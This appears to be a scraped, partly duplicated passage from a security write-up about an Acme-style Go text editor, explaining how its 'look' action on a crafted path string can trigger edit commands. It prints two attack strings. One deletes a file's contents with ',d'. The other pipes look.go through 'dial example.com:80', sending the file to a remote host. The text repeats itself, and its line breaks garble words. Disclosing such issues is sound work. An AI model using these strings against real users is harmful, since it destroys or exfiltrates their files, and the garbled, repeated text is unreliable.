This transmits the contents of look.go to the remote endpoint, and replaces the contents of the window with the remote server's reply. However, the user would have to highlight the entire string themselves, since look won't expand past the pipe character.
The real issue is the ability to use commands like w and r to write and read the files on disk unexpectedly.
Right clicking opens look.go in a new window, selects all bytes in the window, and deletes them.
C:\g\src\github.com\as\a\look.go:,d
Although command execution is possible with button 2, it is unexpected with
look
. An adversary could construct a chain of commands in this form:C:\g\src\github.com\as\a\look.go:,|dial example.com:80
This transmits the contents of look.go to the remote endpoint, and replaces the contents of the window with the remote server's reply. However, the user would have to highlight the entire string themselves, since look won't expand past the pipe character.
The real issue is the ability to use commands like
w
andr
towrite
andread
the files on disk unexpectedly.